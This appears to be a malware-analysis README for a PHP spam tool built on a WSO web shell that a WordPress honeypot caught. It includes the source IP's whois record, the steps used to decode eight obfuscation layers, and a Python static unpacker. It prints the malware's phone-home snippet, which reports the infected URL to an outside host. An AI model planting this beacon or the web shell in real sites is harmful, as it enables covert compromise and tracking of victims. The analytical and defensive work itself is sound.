5.149.250.196WjcyqoD-WcEZBqVmxA8u7wAAAAA.0.file
5.149.250.196WjcyqoD-WcEZBqVmxA8u7wAAAAA.wso.scans
README.md
dc1.php
dc2.php
dc3.php
dc4.php
dc5.php
dc6.php
dc8.php
dc9.php
downloader

db-config.php - Email spamming tool

An Email spamming tool layered on top of an instance of the WSO web shell. There's also a little chunk of "phone home" code:

```php
<?php
// Phone-home beacon: runs only once, using data.bin as a marker file.
if (file_exists('data.bin') == false) {
    // URL of the infected page, e.g. victim-host/path/db-config.php
    $url = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    // Report it, base64-encoded, to the operator's collection server.
    file_get_contents("http://3x.od.ua/shell/index.php?shell=" . base64_encode($url));
    // Create the empty marker file so the beacon is not sent again.
    $fp1 = fopen("data.bin", "w");
    fclose($fp1);
}
```

Sends the URL of the installed db-config.php to a web site in the Ukrainian .od.ua domain, once per installation. The empty file named "data.bin" that it leaves lying around is the marker that suppresses repeat beacons, and is a useful on-disk indicator of this infection.

Origin

IP Address 5.149.250.196

person:         Vilko Damianov
address:        4000, Bulgaria, Plovdiv, 2 Lyuben Karavelov, unit 5
phone:          +35932571279
nic-hdl:        VD3206-RIPE
mnt-by:         HZ-HOSTING-LTD
created:        2016-11-28T15:25:07Z
last-modified:  2016-11-28T15:25:07Z
source:         RIPE

% Information related to '5.149.250.0/23AS61046'

route:          5.149.250.0/23
descr:          HZ-HOSTING-LTD
origin:         AS61046
mnt-by:         HZ-HOSTING-LTD
created:        2013-03-05T14:08:17Z
last-modified:  2016-11-28T19:10:21Z
source:         RIPE

5.149.250.196 is apparently located in London, UK.

Download

Downloaded to a fake WSO web shell that is part of a WordPress honey pot. Apparently part of a larger campaign that re-compromises WordPress sites on which someone else had previously installed WSO.

Decoding

Decoded by a series of hand edits and executions, each one producing the next file:

  1. 5.149.250.196WjcyqoD-WcEZBqVmxA8u7wAAAAA.0.file -> dc1.php
  2. dc1.php -> dc2.php
  3. dc2.php -> dc3.php
  4. dc3.php -> dc4.php
  5. dc4.php -> dc5.php
  6. dc5.php -> dc6.php
  7. dc6.php -> dc8.php
  8. dc8.php -> dc9.php

In each case, I had to replace eval with print, and possibly add a "<?php" opening tag.

Some automated encoding program must exist that lets its user choose how many layers of about 3 different obfuscation methods get applied.

File dc9.php holds the code that a correct invocation of the tool's URL would actually execute, once the 8 or 9 levels of eval(gzinflate(base64_decode())) have been unwrapped.
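The "replace eval with print" loop above can also be done statically, so the payload is never executed at any layer. The following unpacker is an added example, not code from this repository: it peels nested eval(gzinflate(base64_decode('...'))) layers with Python's zlib (PHP's gzinflate is raw DEFLATE) and builds its own constructed three-layer sample around a harmless stand-in, so it runs offline.

```python
import base64
import re
import zlib

# One packer layer as the README describes it: eval(gzinflate(base64_decode('...'))).
# Assumption: every layer uses exactly this chain; any other wrapper stops the loop.
LAYER_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)"
)

def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() is raw DEFLATE (no zlib/gzip header), hence wbits=-15."""
    return zlib.decompress(data, -15)

def gzdeflate(data: bytes) -> bytes:
    """PHP gzdeflate(), the inverse; used here only to build the constructed sample."""
    comp = zlib.compressobj(wbits=-15)
    return comp.compress(data) + comp.flush()

def peel_layer(php: str):
    """Decode one layer statically; return the inner source, or None if no wrapper."""
    m = LAYER_RE.search(php)
    if m is None:
        return None
    blob = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
    return gzinflate(blob).decode("utf-8", errors="replace")

def unpack(php: str, max_layers: int = 32):
    """Safe version of 'replace eval with print': peel nested layers without ever
    executing the payload. Returns (final_source, layers_removed)."""
    layers = 0
    while layers < max_layers:
        inner = peel_layer(php)
        if inner is None:
            break
        php, layers = inner, layers + 1
    return php, layers

def wrap(php: str, layers: int) -> str:
    """Build a constructed N-layer sample around harmless stand-in code."""
    for _ in range(layers):
        b64 = base64.b64encode(gzdeflate(php.encode())).decode()
        php = "eval(gzinflate(base64_decode('%s')));" % b64
    return "<?php\n" + php  # inner layers carry no <?php tag, as the README notes

# Constructed stand-in for the real payload; nothing here is ever executed as PHP.
SAMPLE_INNER = "echo 'constructed stand-in payload';"
SAMPLE = wrap(SAMPLE_INNER, 3)
```

On a real sample, run unpack() on the file contents and inspect the returned source; a layer that uses a different wrapper (str_rot13, a custom decoder) stops the loop and shows up as a non-zero layer count with eval still present.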